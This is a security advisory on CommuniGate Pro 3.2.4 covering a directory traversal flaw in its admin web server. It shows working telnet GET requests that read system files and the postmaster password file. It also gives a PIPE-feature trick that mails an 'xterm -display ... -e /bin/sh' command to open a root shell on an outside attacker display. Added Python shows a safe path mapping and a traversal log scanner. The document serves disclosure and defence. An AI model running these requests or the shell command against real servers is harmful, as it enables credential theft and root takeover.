COMMAND
CommuniGate Pro
SYSTEMS AFFECTED
CommuniGate Pro v3.2.4
PROBLEM
Lluis Mora found the following. CommuniGate Pro is a feature-rich
commercial mail server: it does SMTP message routing and provides
POP, IMAP and HTTP access to mail, among other things.
The CommuniGate Pro mail server has a built-in web server that
allows users to read and send e-mail through the web, as well as
allowing the administrator to remotely manage the mail server
settings. By default it opens port 8100/tcp for web users access
to mail and port 8010/tcp for web management access.
1. Reading any file in the mail server
======================================
CommuniGate provides a useful mapping for accessing the Web User
Guide, which maps the URL /Guide/ to a directory in the
CommuniGate subtree. The built-in web server suffers from the
well-known "../.." (directory traversal) web server problem. If we
request a document through the administrative web server's /Guide/
mapping using the "../.." technique, we get to see the file's contents:
homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../../../../../etc/motd HTTP/1.0
HTTP/1.0 200 OK
[... the /etc/motd file content is shown]
Connection closed by foreign host.
homer:~$
As CommuniGate runs as root and doesn't drop any privileges, we are
able to read any file on the system, e.g. /etc/shadow.
For example, we can retrieve the postmaster/manager settings file,
which includes the plaintext password for the management website:
homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings HTTP/1.0
HTTP/1.0 200 OK
Content-Length: 61
Date: Mon, 03 Apr 2000 09:17:35 GMT
Content-Type: application/octet-stream
Server: CommuniGatePro/3.2.4
Expires: Tue, 04 Apr 2000 09:17:35 GMT
{ ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}
Connection closed by foreign host.
homer:~$
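The following is an added example written for this advisory; it is not CommuniGate's code and was not part of Lluis Mora's report. It shows the defect described above beside its fix: unsafe_map() mirrors a naive prefix-to-directory mapping that passes "../" segments straight to the filesystem, safe_map() percent-decodes, normalises and then confirms the resolved path still lies under the document root, and is_traversal_attempt() flags request lines like the ones shown above when run over a web-server log. The document root GUIDE_ROOT and the sample request lines are assumptions constructed for the example.

```python
"""Prefix-to-directory mapping done wrong and done right, plus a log
check for "../.." requests.  Added example, not CommuniGate's code."""
import os
import re
from typing import List, Optional
from urllib.parse import unquote

# Assumed document root for the /Guide/ mapping; the real CommuniGate
# directory layout is not given in the advisory.
GUIDE_ROOT = "/var/CommuniGate/WebGuide"
PREFIX = "/Guide/"


def unsafe_map(url_path: str, root: str = GUIDE_ROOT) -> str:
    """The naive mapping: strip the URL prefix and glue the remainder
    onto the root directory.  Every "../" segment reaches the
    filesystem untouched, which is exactly the defect in the report."""
    return root + "/" + url_path[len(PREFIX):]


def safe_map(url_path: str, root: str = GUIDE_ROOT) -> Optional[str]:
    """Map a request path under /Guide/ to a file inside `root`.
    Returns None for anything that would resolve outside the root."""
    if not url_path.startswith(PREFIX):
        return None
    # Decode percent-encoding twice so %2e%2e and doubly encoded
    # %252e%252e variants are both seen as "..".
    rel = unquote(unquote(url_path[len(PREFIX):]))
    # NUL bytes truncate paths in C runtimes; never pass them on.
    if "\x00" in rel:
        return None
    # Treat backslashes as separators (they are on some platforms) and
    # drop leading slashes so os.path.join cannot discard the root.
    rel = rel.replace("\\", "/").lstrip("/")
    candidate = os.path.normpath(os.path.join(root, rel))
    root_norm = os.path.normpath(root)
    # The lexical check: the result must be the root itself or live
    # strictly below it (root + separator guards against /WebGuideX).
    if candidate != root_norm and not candidate.startswith(root_norm + os.sep):
        return None
    return candidate


# A ".." path segment, i.e. ".." bounded by slashes or string ends.
TRAVERSAL_RE = re.compile(r"(?:^|/)\.\.(?:/|$)")


def is_traversal_attempt(request_line: str) -> bool:
    """True if the request target (second token of an HTTP request
    line) contains a ".." segment after percent-decoding."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    target = unquote(unquote(parts[1])).replace("\\", "/")
    return bool(TRAVERSAL_RE.search(target))


def scan_requests(lines: List[str]) -> List[str]:
    """Return the request lines that look like traversal attempts."""
    return [line for line in lines if is_traversal_attempt(line)]


# Constructed sample request lines (the first mirrors the advisory).
SAMPLE_REQUESTS = [
    "GET /Guide/../../../../../../../../../../../../../../../etc/motd HTTP/1.0",
    "GET /Guide/index.html HTTP/1.0",
    "GET /Guide/..%2f..%2fetc/passwd HTTP/1.0",
    "GET /Guide/..notes.html HTTP/1.0",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        path = req.split()[1]
        print(f"{req}\n  unsafe -> {unsafe_map(path)}\n  safe   -> {safe_map(path)}")
    print("flagged:", scan_requests(SAMPLE_REQUESTS))
```

Note that the lexical check alone does not defend against symbolic links inside the document root; a production server would additionally resolve the candidate with os.path.realpath() and, ideally, would not be running as root in the first place, so that a mapping slip exposes the guide directory rather than /etc/shadow.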
2. Remote execution of arbitrary commands as root
=================================================
This is not a vulnerability in itself but a demonstration of what
can be accomplished once an attacker has obtained the postmaster
password.
Looking through the features of CommuniGate, we find the PIPE feature,
which allows e-mail to be delivered to a program on the mail server.
It is disabled by default, but once we can access the mail server
settings using the postmaster password, we can simply enable it,
set the application directory to /usr/X11R6/bin/, increase the
maximum process execution time, and send an e-mail to
"xterm -display 172.16.2.4:0 -e /bin/sh"@
pipe, which will open a root xterm on our desktop...
This bug has been tested on the Linux (Red Hat and non-Red Hat) v3.2.4
distribution (the latest stable release) found at www.stalker.com.
It has not been tested on other platforms or previous versions,
though we strongly believe the bug is platform independent and
can probably be found and reproduced in previous releases.
SOLUTION
Current beta versions (from v3.3b2 onwards) don't suffer from this
security problem. An upcoming stable release (v3.3) will fix this
problem, and the current v3.3 betas (v3.3b2 or newer) are already
patched against this attack. Upgrades are available from the
vendor website.